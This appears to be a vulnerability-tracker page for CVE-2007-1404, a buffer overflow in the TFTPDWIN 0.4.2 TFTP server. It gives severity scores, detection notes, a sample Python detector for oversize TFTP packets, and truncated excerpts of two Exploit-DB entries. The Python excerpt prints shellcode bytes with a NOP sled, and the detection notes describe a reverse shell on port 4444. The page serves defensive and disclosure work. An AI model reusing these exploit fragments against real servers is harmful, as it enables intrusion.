CVE-2007-1404
Published 2007-03-10
Priority: P3 · 41 · high · 7.3 (CVSS 2.0)
Vector: AV:A/AC:M/Au:N/C:C/I:N/A:C
EXPLOIT
EPSS: 66.74% (99.2th percentile)
tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 allows remote attackers to cause a denial of service via a long UDP packet that is not properly handled in a recv_from call. NOTE: this issue might be related to CVE-2006-4948.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prosysinfo | tftp_server_tftpdwin | — | — |
Detection & IOCs
bytes:
\x00\x01\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x8b\xc3\x66\x05\x12\x01\x50\xc3
- Trigger condition is a UDP packet to port 69 exceeding 516 bytes; any UDP datagram to TFTP port 69 with length > 516 bytes should be flagged.
- The exploit buffer begins with the two-byte TFTP opcode \x00\x01 (Read Request), followed by NOP sleds and shellcode; detect anomalously large TFTP RRQ packets on UDP/69.
- Post-exploitation reverse shell connects back on TCP port 4444; monitor for unexpected outbound telnet/TCP connections on port 4444 from the TFTP server process (tftpd.exe).
- The shellcode contains the ASCII string 'netascii' (\x6e\x65\x74\x61\x73\x63\x69\x69) near the end of the buffer payload; this can serve as a byte-pattern signature in UDP/69 traffic.
- The buffer overflow exploit is noted to be sensitive to buffer length; payloads may vary across attack attempts, so signature-based detection should focus on the packet size threshold (>516 bytes on UDP/69) rather than exact byte sequences alone.
- This vulnerability may be related to CVE-2006-4948; detections covering one may partially cover the other, but they should be treated as distinct until confirmed.
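A minimal check implementing the size-threshold guidance above, as an added example (not part of the original page or of any source it indexes). It assumes the 516-byte limit applies to the UDP payload; the function name, finding labels and sample datagrams are constructed for illustration.

```python
import struct

TFTP_PORT = 69
MAX_TFTP_PAYLOAD = 516   # threshold from the page; also 4-byte header + 512 data bytes (RFC 1350)
OP_RRQ = 1
VALID_MODES = {b"netascii", b"octet", b"mail"}  # RFC 1350 transfer modes

def inspect_tftp_datagram(dst_port, payload):
    """Return a list of finding strings for one UDP payload (empty list = nothing to flag)."""
    findings = []
    if dst_port != TFTP_PORT or len(payload) < 2:
        return findings
    (opcode,) = struct.unpack("!H", payload[:2])
    if len(payload) > MAX_TFTP_PAYLOAD:
        findings.append("oversize-datagram:%d" % len(payload))
        if opcode == OP_RRQ:
            findings.append("oversize-rrq")
    if opcode == OP_RRQ:
        # Well-formed RRQ: opcode | filename | 0 | mode | 0 [| option | 0 | value | 0 ...]
        fields = payload[2:].split(b"\x00")
        well_formed = (
            payload.endswith(b"\x00")
            and len(fields) >= 3
            and fields[0] != b""
            and fields[1].lower() in VALID_MODES
        )
        if not well_formed:
            findings.append("malformed-rrq")
    return findings

# Constructed sample inputs (not captured traffic): (label, dst_port, payload)
SAMPLES = [
    ("normal RRQ", 69, b"\x00\x01boot.cfg\x00octet\x00"),
    ("full DATA block", 69, b"\x00\x03\x00\x01" + b"A" * 512),
    ("oversize RRQ", 69, b"\x00\x01" + b"A" * 600 + b"\x00netascii\x00"),
    ("oversize, no terminators", 69, b"\x00\x01" + b"A" * 700),
    ("other port", 4444, b"\x00\x01" + b"A" * 700),
]

def run_samples():
    return {label: inspect_tftp_datagram(port, data) for label, port, data in SAMPLES}

if __name__ == "__main__":
    for label, findings in run_samples().items():
        print("%-26s %s" % (label, findings or "ok"))
```

The size check fires regardless of payload bytes, which matches the note that payloads vary between attempts; the structural check is a secondary signal for RRQs that lack the NUL-terminated filename and mode fields.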
No detection rules found.
Exploit-DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)
exploitdb·2009-08-18
---
```python
#!/usr/bin/python
#ProSysInfo TFTP Server TFTPDWIN 0.4.2
#Coded by Wraith
import os
import sys
import struct
import socket
import time
print "\nProSysInfo TFTP Server TFTPDWIN 0.4.2"
print "Note: This vuln is sensitive to different buffer length\n"
if len(sys.argv)!=2:
    print "Usage: tftpdwin.py "
    sys.exit(0)
buffer = "\x00\x01\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
buffer += "\x8b\xc3\x66\x05\x12\x01\x50\xc3" + "\x90"*57
buffer += "\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64"
buffer += "\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C"
buffer += "\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77"
buffer += "\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\x
```
Exploit-DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - 'UDP' Denial of Service
exploitdb·2007-03-08
---
```perl
#!/usr/bin/perl
#
# TFTPDWIN Server UDP DOS 0.4.2 POC
# written By : Umesh Wanve ([email protected])
#
#-------------------------------------------------------------------------------
# TFTPDWIN Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.tftpserver.prosysinfo.com.pl)
# A vulnerability has been identified in TFTP Server TFTPDWIN Server v0.4.2, which
# could be exploited by remote or local attackers to execute arbitrary commands
# or cause a denial of service. This flaw is when attacker sends UDP packet of length more than 516 bytes
#
#----------------------------Start of Code-------------------------------------
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET
```
No writeups or analysis indexed.
- http://osvdb.org/33919
- http://secunia.com/advisories/24452
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32886
- https://www.exploit-db.com/exploits/3432